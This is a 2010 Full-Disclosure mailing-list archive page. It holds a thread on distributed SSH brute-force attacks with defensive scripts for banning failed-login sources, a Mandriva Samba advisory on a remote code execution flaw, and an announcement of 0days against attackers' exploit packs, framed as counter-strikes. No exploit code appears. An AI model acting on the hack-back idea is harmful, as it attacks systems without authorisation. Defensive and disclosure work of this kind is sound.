> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
> interesting to see new types of attacks. The question here is whether
> anyone else is seeing such a targeted attack.
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
>
> On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>>
>> Have you ever considered obfuscated-openssh?
>>
>> http://github.com/brl/obfuscated-openssh
>>
>> I have a modified version of PuTTY available for it...
>>
>> http://www.mrhinkydink.com/potty.htm
>>
>> Still... you should change the freakin' port.
>>
>>  Original Message 
>> Subject: [Full-disclosure] targetted SSH bruteforce attacks
>> From: Gary Baribault
>> Date: Thu, June 17, 2010 7:48 am
>> To: full-disclosure@lists.grok.org.uk
>>
>> Hello list,
>>
>> I have a strange situation and would like information from the list
>> members. I have three Linux boxes exposed to the Internet. Two of
>> them are on cable modems, and both have two services that are
>> publicly available. In both cases, I have SSH and named running and
>> available to the public. Before you folks say it, yes I run SSH on
>> TCP/22 and no I don't want to move it to another port, and no I
>> don't want to restrict it to certain source IPs.
>>
>> Both of these systems are within one /21 and get attacked
>> regularly. I run Denyhosts on them, and update the central server
>> once an hour with attacking IPs, and obviously also download the
>> public hosts.deny list.
>>
>> These machines get hit regularly, so often that I don't really
>> care, it's fun to make the script kiddies waste their time! But in
>> this instance, only my home box is being attacked... someone is
>> burning a lot of cycles and hosts to do a distributed dictionary
>> attack on my one box! The named daemon is non recursive, properly
>> configured, up to date and not being attacked.
>>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>> Thanks
>>
>>
>> Gary Baribault
>> Courriel: g...@baribault.net
>> GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>>
>
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Frank Bures
Gary Baribault wrote:
> I just knew that people would say that, and that's why I specified
> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
> interesting to see new types of attacks. The question here is whether
> anyone else is seeing such a targeted attack.

I've seen an interesting SSH attack in the last couple of days on our /22
network.  Instead of probing port 22 on many machines in the shortest
possible time period as usual, this attack seems to be trying to be
stealthy.  It never attacks more than 4 machines in an hour and never twice
from the same IP address.  As all attacking addresses are subsequently
blocked, I wonder how long it is going to take for the guy(s) to run out of
available addresses at this rate :-)

Cheers
Frank





Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gregory Bellier
Hi !

Most of the time (to not say every time), it's a bot and not a human behind
those attacks.
I configured my firewall to ban for a minute every IP trying to log in with
5 wrong attempts.
Once it's banned, the bot tries one or two more times and then gives up.

It's pretty effective.



2010/6/17 Gary Baribault 

> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Samuel Martín Moro
I also don't want to change my ssh port, nor restrict incoming IPs, ... and
I use keys only to log in without entering password.
So you're not alone.
I had my IP changed several times, my servers are only hosting personal
data.
But I'm still seeing bruteforce attempts in my logs.

Here's something I use on my servers.
In cron, every 5-10 minutes, that should do it.
Of course, if you're running *BSD, pf is way more interesting to do that.


---

#!/bin/sh
# Append hosts with 3 or more failed/illegal/invalid SSH logins to hosts.deny.

AUTH=/var/log/auth.log
BKLST=/var/log/blacklist.log
HOSTS=/etc/hosts
DHOSTS=/etc/hosts.deny
LOCAL_IP=_your_ip_

# Distinct source addresses of failed logins: the address is the first word
# after "from" on each matching line.
egrep -i "(failed|illegal|invalid)" "$AUTH" | awk -F "from" '{ print $2 }' \
    | awk '{ print $1 }' | sort -u > "$BKLST"

for i in $(cat "$BKLST")
do
    # fewer than 3 failures: leave it alone (-Fw so 1.2.3.4 does not match 1.2.3.45)
    test "$(egrep -i "(failed|illegal|invalid)" "$AUTH" | grep -Fw -- "$i" | wc -l)" -ge 3 || continue
    # never ban our own address or anything already listed in hosts / hosts.deny
    echo "$i" | grep -Fq -- "$LOCAL_IP" && continue
    grep -Fqw -- "$i" "$HOSTS" && continue
    grep -Fqw -- "$i" "$DHOSTS" && continue
    echo "ALL : $i  # matched on $(date)" >> "$DHOSTS"
done

---

Samuel Martín Moro
{EPITECH.} tek4
CamTrace S.A.S

"Nobody wants to say how this works.
 Maybe nobody knows ..."
 Xorg.conf(5)


On Thu, Jun 17, 2010 at 1:48 PM, Gary Baribault  wrote:

> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
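The script above and Gregory's firewall rule earlier in the thread are the same idea with different knobs: count failures per source address, ban past a threshold, keep your own addresses out of the list. Both are easy to get subtly wrong with grep and awk, so here is the same logic as an added Python example (not the author's script and not the firewall rule): it parses sshd's failure lines with a regex anchored on the "from ADDR port N" tail, so a username that is literally "from" cannot shift the address; compares addresses exactly, so 198.51.100.4 never matches 198.51.100.45; applies a time window, so a ban expires the way the one-minute firewall ban does; and emits hosts.deny entries without duplicating ones already present. Thresholds, the whitelist address and the log lines are constructed, and it handles IPv4 only.

```python
"""Fail-count banning with a real parser instead of grep/awk.

Added example, not the post's shell script: bans an address after THRESHOLD
failed logins inside WINDOW, expires the ban BAN_FOR later, and renders
hosts.deny entries.  Handles a username containing 'from' and addresses that
are prefixes of one another.  Constructed log lines; IPv4 only.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

THRESHOLD = 3                       # failures that trigger a ban (assumed)
WINDOW = timedelta(minutes=10)      # ... within this span (assumed)
BAN_FOR = timedelta(minutes=1)      # ban length, as in the firewall-rule post
WHITELIST = {"192.0.2.10"}          # our own addresses, matched exactly (constructed)
LOG_YEAR = 2010                     # syslog timestamps carry no year

# sshd: 'Failed password for [invalid user ]NAME from ADDR port N ssh2'.
# The address is anchored on the 'from ADDR port' tail, so NAME may contain 'from'.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>.+?) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(lines, year=LOG_YEAR):
    """Yield (timestamp, user, ip) for every failed-password line."""
    for line in lines:
        m = FAIL_RE.match(line)
        if not m:
            continue
        stamp = re.sub(r"\s+", " ", m["ts"])          # 'Jun  7' -> 'Jun 7'
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def bans(lines, threshold=THRESHOLD, window=WINDOW, ban_for=BAN_FOR, whitelist=WHITELIST):
    """Return {ip: ban_expiry}: an address is banned when `threshold` failures
    fall inside `window`; the ban ends `ban_for` after the failure that tripped it.
    A slow attacker spreading guesses over hours stays under the window on
    purpose; widen WINDOW to catch that at the cost of more false positives."""
    by_ip = defaultdict(list)
    for ts, _user, ip in parse_failures(lines):
        if ip in whitelist:                 # exact match, never a substring test
            continue
        by_ip[ip].append(ts)
    expiry = {}
    for ip, times in by_ip.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                expiry[ip] = times[i + threshold - 1] + ban_for
                break
    return expiry


def hosts_deny_lines(banned, existing):
    """Render 'ALL : ip' entries, skipping addresses already in hosts.deny."""
    present = set()
    for line in existing:
        if ":" in line and not line.lstrip().startswith("#"):
            rest = line.split(":", 1)[1].split()
            if rest:
                present.add(rest[0])
    return [f"ALL : {ip}" for ip in sorted(banned) if ip not in present]


# constructed sample log: a fast guesser, a guesser whose username is 'from'
# and whose address is a prefix-collision with the first, a whitelisted
# user who mistyped once, and a slow guesser spreading attempts over hours
LOG = """\
Jun 17 07:48:01 home sshd[2101]: Failed password for root from 198.51.100.4 port 41022 ssh2
Jun 17 07:48:03 home sshd[2101]: Failed password for root from 198.51.100.4 port 41022 ssh2
Jun 17 07:48:05 home sshd[2101]: Failed password for root from 198.51.100.4 port 41022 ssh2
Jun 17 07:48:20 home sshd[2107]: Failed password for invalid user from from 198.51.100.45 port 41100 ssh2
Jun 17 07:48:21 home sshd[2107]: Failed password for invalid user from from 198.51.100.45 port 41100 ssh2
Jun 17 07:48:22 home sshd[2107]: Failed password for invalid user from from 198.51.100.45 port 41100 ssh2
Jun 17 07:50:00 home sshd[2120]: Failed password for gary from 192.0.2.10 port 50000 ssh2
Jun 17 07:50:30 home sshd[2120]: Accepted publickey for gary from 192.0.2.10 port 50000 ssh2
Jun 17 08:30:00 home sshd[2150]: Failed password for admin from 203.0.113.9 port 1234 ssh2
Jun 17 09:30:00 home sshd[2151]: Failed password for admin from 203.0.113.9 port 1235 ssh2
Jun 17 10:30:00 home sshd[2152]: Failed password for admin from 203.0.113.9 port 1236 ssh2
"""

if __name__ == "__main__":
    banned = bans(LOG.splitlines())
    for ip, until in sorted(banned.items()):
        print(ip, "banned until", until)
    print("\n".join(hosts_deny_lines(banned, [])))
```

In the sample, 203.0.113.9 stays unbanned because its three failures are an hour apart, which is the kind of slow attack Frank describes above; whether to widen the window for that is a judgement about false positives on your own mistyped passwords.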

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
On this system, there is only one user allowed, and that's me. On one
of my other systems, there are two, but both good security guys. I run a
bash script every night to grep the successful and unsuccessful logins
every night that is mailed to me, that's how I spot these things
quick. Also Denyhosts emails me for every Deny.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 10:56 AM, Michael Holstein wrote:
>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>>  
>
> No, I assure you it's not just you.
>
> It's also not uncommon to see a sequential (basically a nmap -p 22) scan
> at full throttle several times a day.
>
> You can basically :
>
> a) move to another port (obscurity .. but pretty effective in weeding
> out the casual versus committed)
> b) switch to public key only auth (recommended anyway if possible).
> c) use denyhosts, tarpitting, etc. to frustrate the casual guessers and
> bots.
>
> The ones that are committed will find a way around (a) and (c). But it
> will take somebody a long time to properly guess a key for (b) ..
> unless you forgot to patch your Debian SSHd from their little snafu ..
> but you'd have been owned long ago if that was the case.
>
> If you really must use passwords on a multi-user system listening on
> tcp/22, then employ something like the PAM modules for JTR
> (pam_passwdqc) just to make sure people don't use stupid ones.
>
> Cheers,
>
> Michael Holstein
> Cleveland State University
>


[Full-disclosure] [ MDVSA-2010:119 ] samba

2010-06-17 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:119
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: June 17, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in samba:
 
 Samba versions 3.0.x, 3.2.x and 3.3.x are affected by a memory
 corruption vulnerability. Code dealing with the chaining of SMB1
 packets did not correctly validate an input field provided by the
 client, making it possible for a specially crafted packet to crash
 the server or potentially cause the server to execute arbitrary code
 (CVE-2010-2063).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 a67b12f9b389badf7b0aa3d3051bfa84  
2008.0/i586/libsmbclient0-3.0.37-0.4mdv2008.0.i586.rpm
 c7efb3df76e8787d446e2e89f32e0788  
2008.0/i586/libsmbclient0-devel-3.0.37-0.4mdv2008.0.i586.rpm
 242adc8ea68149bfb355044a9284e359  
2008.0/i586/libsmbclient0-static-devel-3.0.37-0.4mdv2008.0.i586.rpm
 58878d10f339175a362f15c4edc058c5  
2008.0/i586/mount-cifs-3.0.37-0.4mdv2008.0.i586.rpm
 b09533c807559a06c0c5463ac709f6f3  
2008.0/i586/nss_wins-3.0.37-0.4mdv2008.0.i586.rpm
 080fc1b95319564e9f81f8d30bc2c6a7  
2008.0/i586/samba-client-3.0.37-0.4mdv2008.0.i586.rpm
 814ed3e299433390d248a5cdd3e2ecd0  
2008.0/i586/samba-common-3.0.37-0.4mdv2008.0.i586.rpm
 fc4a5b969ef2c9eb6f1bce1946992b60  
2008.0/i586/samba-doc-3.0.37-0.4mdv2008.0.i586.rpm
 990160cc240b70b9c78c449030700571  
2008.0/i586/samba-server-3.0.37-0.4mdv2008.0.i586.rpm
 476a7671df375818923a8d3926b83b12  
2008.0/i586/samba-swat-3.0.37-0.4mdv2008.0.i586.rpm
 deac94c8be00158637af68f75523c4e1  
2008.0/i586/samba-vscan-icap-3.0.37-0.4mdv2008.0.i586.rpm
 39bfefe0074e88d3519b9a2b17dc972b  
2008.0/i586/samba-winbind-3.0.37-0.4mdv2008.0.i586.rpm 
 a180848342054c9fcca897aa705e  
2008.0/SRPMS/samba-3.0.37-0.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6f91be90bdbec6915c3a6ef551d9554d  
2008.0/x86_64/lib64smbclient0-3.0.37-0.4mdv2008.0.x86_64.rpm
 f0c8c5ed89a081490de47e0620dfe21f  2008.0/x86_64/lib64smbclient0-devel-3.0.37-0.4mdv2008.0.x86_64.rpm
 f8ffe0766f66fb27089069e0fed7e985  2008.0/x86_64/lib64smbclient0-static-devel-3.0.37-0.4mdv2008.0.x86_64.rpm
 6a2b184259c1752c9d2316a6b38c5e04  2008.0/x86_64/mount-cifs-3.0.37-0.4mdv2008.0.x86_64.rpm
 598345527f4b0359a3296e3ce4f717fb  2008.0/x86_64/nss_wins-3.0.37-0.4mdv2008.0.x86_64.rpm
 3e19f852dad61d46304a1d4f4c2a9dcc  2008.0/x86_64/samba-client-3.0.37-0.4mdv2008.0.x86_64.rpm
 40c4fab42efdedb92e2f638614802738  2008.0/x86_64/samba-common-3.0.37-0.4mdv2008.0.x86_64.rpm
 29bcda428cb08985155f68907560dd3c  2008.0/x86_64/samba-doc-3.0.37-0.4mdv2008.0.x86_64.rpm
 657e29fe549f0f27f4fe77f5df042b6f  2008.0/x86_64/samba-server-3.0.37-0.4mdv2008.0.x86_64.rpm
 11cf0cfc25b454126bc1e7fd857bc35a  2008.0/x86_64/samba-swat-3.0.37-0.4mdv2008.0.x86_64.rpm
 d0f2a65d17be218b22f056838499725e  2008.0/x86_64/samba-vscan-icap-3.0.37-0.4mdv2008.0.x86_64.rpm
 77fcbc3b05869081af23be75f8909851  2008.0/x86_64/samba-winbind-3.0.37-0.4mdv2008.0.x86_64.rpm
 a180848342054c9fcca897aa705e  2008.0/SRPMS/samba-3.0.37-0.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 8aa4e47d93beba9c62a665385b840e52  2009.0/i586/libnetapi0-3.3.12-0.3mdv2009.0.i586.rpm
 11092927d2c0bdca21e56da366a23a1b  2009.0/i586/libnetapi-devel-3.3.12-0.3mdv2009.0.i586.rpm
 ff2ab62b297ef1e7d5657433b3a290c5  2009.0/i586/libsmbclient0-3.3.12-0.3mdv2009.0.i586.rpm
 f462b6ae0b8e9e2d2c0c98311c4ee117  2009.0/i586/libsmbclient0-devel-3.3.12-0.3mdv2009.0.i586.rpm
 b67354d7363860d3c0d3a9ba098da407  2009.0/i586/libsmbclient0-static-devel-3.3.12-0.3mdv2009.0.i586.rpm
 3ad7113c1663f640214f1fb0b4ca3815  2009.0/i586/libsmbsharemodes0-3.3.12-0.3mdv2009.0.i586.rpm
 dafe0b64b181143d9e280859eea6f20b  2009.0/i586/libsmbsharemodes-devel-3.3.12-0.3mdv2009.0.i586.rpm
 2e46480abff44ae27f790b03144295d2  2009.0/i586/libtalloc1-3.3.12-0.3mdv2009.0.i586.rpm
 922f2ad91ff59a19afc83ace0bf34bd9  2009.0/i586/libtalloc-devel-3.3.12-0.3mdv2009.0.i586.rpm
 32e5364faad127db6ad1b6ef948d80f1  2009.0/i586/libtdb1-3.3.12-0.3mdv2009.0.i586.rpm
 6b94d68f8271b94063f7c3646c51e2ef  2009.0/i586/libtdb-devel-3.3.12-0.3mdv2009.0.i586.rpm
 bd58c875f5e2ae8dee734036e0c86f69  2009.0/i586/libwbclien

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Bipin Gautam
Try port knocking + shh and rest of the above suggestions?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Valdis . Kletnieks
On Thu, 17 Jun 2010 16:04:25 BST, Benji said:
> Anyone. else. seeing. a. targetted. attack.
> 
> Why would anyone else see a TARGETTED attack?

I think the original poster meant "targeted" as in "we've got a fairly big
address space, and exactly one host is being poked, rather than every single
one like most scan-and-attack".




Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
What the question was asking was 'is anyone else' having one machine
attacked in particular as opposed to all of their machines.

What I explained in the original post was that in all past instances
(many times a day, every day) when one machine is attacked, the other
is as well, since they are close to each other on a major cable modem
ISP. In this case only one of the machines is being attacked, and it's
a relatively stealthy attack.

So the question is if anyone else is seeing the same type of activity.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 11:04 AM, Benji wrote:
> What?
>
> Think about what you said.
>
> Anyone. else. seeing. a. targetted. attack.
>
> Why would anyone else see a TARGETTED attack?
>
> anyway, no, you're not special, distributed SSH bruteforce is normal.
>
>
> On Thu, Jun 17, 2010 at 1:44 PM, Gary Baribault  wrote:
>> I just knew that people would say that, and that's why I specified
>> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
>> interesting to see new types of attacks. The question here is whether
>> anyone else is seeing such a targeted attack.
>>
>> Gary Baribault
>> Courriel: g...@baribault.net
>> GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>>
>> On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>>>
>>> Have you ever considered obfuscated-openssh?
>>>
>>> http://github.com/brl/obfuscated-openssh
>>>
>>> I have a modified version of PuTTY available for it...
>>>
>>> http://www.mrhinkydink.com/potty.htm
>>>
>>> Still... you should change the freakin' port.
>>>
>>>  Original Message  Subject: [Full-disclosure]
>>> targetted SSH bruteforce attacks From: Gary Baribault
>>>  Date: Thu, June 17, 2010 7:48 am To:
>>> full-disclosure@lists.grok.org.uk
>>>
>>> Hello list,
>>>
>>> I have a strange situation and would like information from the list
>>> members. I have three Linux boxes exposed to the Internet. Two of
>>> them are on cable modems, and both have two services that are
>>> publicly available. In both cases, I have SSH and named running and
>>> available to the public. Before you folks say it, yes I run SSH on
>>> TCP/22 and no I don't want to move it to another port, and no I
>>> don't want to restrict it to certain source IPs.
>>>
>>> Both of these systems are within one /21 and get attacked
>>> regularly. I run Denyhosts on them, and update the central server
>>> once an hour with attacking IPs, and obviously also download the
>>> public hosts.deny list.
>>>
>>> These machines get hit regularly, so often that I don't really
>>> care, it's fun to make the script kiddies waste their time! But in
>>> this instance, only my home box is being attacked... someone is
>>> burning a lot of cycles and hosts to do a distributed dictionary
>>> attack on my one box! The named daemon is non recursive, properly
>>> configured, up to date and not being attacked.
>>>
>>> Is anyone else seeing this type of attack? Or is someone really
>>> targeting MY box?
>>>
>>> Thanks
>>>
>>>
>>> Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1
>>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>>
>>>
>>
>>
>>
>


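The shape Gary describes, one host probed by many sources that each make only a few attempts, can be told apart from the usual one-source hammering by counting sources rather than attempts per source. The script below is an added example written for this page; it is not code from the thread, from DenyHosts or from fail2ban. It parses sshd "Failed password" lines in the standard auth.log format, summarises attempts per source and per username, labels the activity, and emits DenyHosts-style hosts.deny entries. The log lines are constructed (RFC 5737 documentation addresses) and the thresholds are illustrative choices, not anything the thread specifies.

```python
import re
from collections import Counter, defaultdict

# Failed-password line as sshd writes it to auth.log via syslog. The
# "invalid user" marker appears when the account does not exist locally.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F:.]+) port \d+ ssh2"
)

# Constructed sample log (RFC 5737 documentation addresses), not real traffic:
# five sources, one or two tries each, and a shared username list.
SAMPLE_LOG = """\
Jun 17 07:41:02 home sshd[4021]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Jun 17 07:41:09 home sshd[4023]: Failed password for root from 203.0.113.7 port 51030 ssh2
Jun 17 07:42:15 home sshd[4031]: Failed password for invalid user admin from 198.51.100.23 port 40211 ssh2
Jun 17 07:43:51 home sshd[4040]: Failed password for invalid user oracle from 192.0.2.99 port 33800 ssh2
Jun 17 07:44:10 home sshd[4044]: Failed password for root from 192.0.2.99 port 33812 ssh2
Jun 17 07:45:33 home sshd[4050]: Failed password for invalid user admin from 198.51.100.77 port 55120 ssh2
Jun 17 07:46:01 home sshd[4052]: Accepted publickey for gary from 192.0.2.10 port 50001 ssh2
Jun 17 07:47:20 home sshd[4060]: Failed password for invalid user test from 203.0.113.200 port 47001 ssh2
""".splitlines()

# Constructed contrast case: the usual single-source hammering.
SINGLE_SOURCE_LOG = [
    f"Jun 17 08:00:{i:02d} home sshd[5{i:03d}]: Failed password for root "
    f"from 203.0.113.50 port {40000 + i} ssh2"
    for i in range(20)
]


def parse_failures(lines):
    """Yield (source_ip, username) for each failed-password line."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield m.group("ip"), m.group("user")


def summarise(lines):
    """Return (attempts per source, usernames tried per source, attempts per user)."""
    by_ip = Counter()
    users_by_ip = defaultdict(set)
    by_user = Counter()
    for ip, user in parse_failures(lines):
        by_ip[ip] += 1
        users_by_ip[ip].add(user)
        by_user[user] += 1
    return by_ip, users_by_ip, by_user


def classify(lines, max_per_source=5, min_sources=4):
    """Label the failed-login activity in a log window.

    'distributed'   : at least min_sources sources and none above
                      max_per_source attempts. Each node of a botnet stays
                      under a per-IP blocking threshold, so per-IP counting
                      (DenyHosts, fail2ban) never fires; the tell is the
                      number of sources, not the volume from any one.
    'single-source' : one or a few sources doing the bulk of the work.
    'none'          : no failed password logins at all.
    """
    by_ip, _, _ = summarise(lines)
    if not by_ip:
        return "none"
    low_volume = [ip for ip, n in by_ip.items() if n <= max_per_source]
    if len(by_ip) >= min_sources and len(low_volume) == len(by_ip):
        return "distributed"
    return "single-source"


def hosts_deny_entries(lines, threshold=3):
    """DenyHosts-style hosts.deny lines for sources at or above threshold."""
    by_ip, _, _ = summarise(lines)
    return sorted(f"sshd: {ip}" for ip, n in by_ip.items() if n >= threshold)


if __name__ == "__main__":
    for name, log in (("sample", SAMPLE_LOG), ("single", SINGLE_SOURCE_LOG)):
        by_ip, users_by_ip, by_user = summarise(log)
        print(f"{name}: {classify(log)}; sources={len(by_ip)}; "
              f"top users={by_user.most_common(3)}")
        print("  hosts.deny:", hosts_deny_entries(log))
```

The point of the classifier is that a per-IP threshold, which is how DenyHosts and fail2ban decide to block, never fires against a botnet whose nodes each try once or twice. The number of distinct sources hitting one host in a short window is the signal to alert on, and the hosts.deny list for that same window can be empty.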
Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
Thanks Valdis, that's exactly it.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 11:38 AM, valdis.kletni...@vt.edu wrote:
> On Thu, 17 Jun 2010 16:04:25 BST, Benji said:
>   
>> Anyone. else. seeing. a. targetted. attack.
>>
>> Why would anyone else see a TARGETTED attack?
>> 
> I think the original poster meant "targeted" as in "we've got a fairly big
> address space, and exactly one host is being poked, rather than every single
> one like most scan-and-attack".
>
>   



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Randal L. Schwartz
> "Emmanuel" == Emmanuel VERCHERE  writes:

Emmanuel> SSH daemons using password auth exposed to the Internet _do_
Emmanuel> get bruteforce attempts. I would not recommend moving it to a
Emmanuel> different port than 22 as that would be of very, _very_ little
Emmanuel> help - rather switch to public key auth (plus SPA if you're
Emmanuel> paranoid), et voila.

After being regularly nailed on my port 22, I *did* move it.  I've had
only *one* attack since then, down by a factor of 20 or so.

Yes, it's worth it to not be on port 22, as long as you're one of the
few. :)  Remember, these bots are going for low-hanging fruit... it's
not worth it for them to hit all 65k ports.

Now, if we *all* move away from 22, your advice is more appropriate.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
 http://www.stonehenge.com/merlyn/
Smalltalk/Perl/Unix consulting, Technical writing, Comedy, etc. etc.
See http://methodsandmessages.vox.com/ for Smalltalk and Seaside discussion



[Full-disclosure] Update for PS

2010-06-17 Thread mezgani ali
I got a tweet today about a nice and real message in the last IANA update
"for .PS":
http://www.iana.org/domains/root/db/ps.html

Hope that this information will merge quickly and update all brainstorming
routines.

Best regards,
-- 
Ali MEZGANI
Network Engineering/Security
http://securfox.wordpress.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink

Point taken.  However, my ulterior motive was in promoting
obfuscated-openssh, which, IMHO, is an excellent and under-appreciated
enhancement to openssh.

Note that with iptables you can leave ssh on port 22 but have it answer
on other ports.  See http://proxyobsession.net/?p=869

Why anyone would want to do that is beyond me.

 Original Message 
Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault 
Date: Thu, June 17, 2010 8:44 am
To: full-disclosure@lists.grok.org.uk

 I just knew that people would say that, and that's why I specified
 that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
 interesting to see new types of attacks. The question here is whether
 anyone else is seeing such a targeted attack.
 
 Gary Baribault
 Courriel: g...@baribault.net
 GPG Key: 0x685430d1
 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
 
 
 



[Full-disclosure] TEHTRI-Security released 13 0days against web tools used by evil attackers

2010-06-17 Thread Laurent OUDOT at TEHTRI-Security

Gents,

As announced in recent emails here, we have just released 13 0days and
new offensive concepts against most of the tools currently used by web
attackers, like web shells, exploit packs, etc., during our new talk at
SyScan Singapore 2010: http://www.syscan.org/Sg/speakers.html#012

We have given new methods to counter-strike intruders with our new
exploits giving you remote shells, remote SQL injection, permanent XSS
and dangerous XSRF against remote tools used by attackers.

It's time to have strike-back capabilities for real, and to have
alternative and innovative solutions against those security issues.

We have shown how to know, identify, exploit, neutralize or destroy
attackers using those kinds of tools.

For example, we gave (some of) our 0days against known tools like Sniper
Backdoor, Eleonore Exploit Pack, Liberty Exploit Pack, Lucky Exploit
Pack, Neon Exploit Pack, Yes Exploit Pack...

This was a way to explain that you can react when you are under attack.

We hope that this will open a new way to think about IT security
worldwide, and that it might help people sometimes.

Do not hesitate to contact TEHTRI-Security if you need technical
assistance (pentests, incident handling, source code analysis, etc.) from
experts who know how cyber conflicts work for real, which is totally
different from people who have clean certifications or who just
master security research in labs...

Here is the list of the 13 security advisories and 0days that we just
released today.

TEHTRI-SA-2010-023 - Vuln in NEON Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-022 - Vuln in NEON Exploit Pack. SQL Injection.
TEHTRI-SA-2010-021 - Vuln in YES Exploit Pack. Remote File Disclosure.
TEHTRI-SA-2010-020 - Vuln in YES Exploit Pack. Permanent XSS+XSRF admin.
TEHTRI-SA-2010-019 - Vuln in YES Exploit Pack. Remote SQL Injection.
TEHTRI-SA-2010-018 - Vuln in LuckySploit Expl Pack. Remote control.
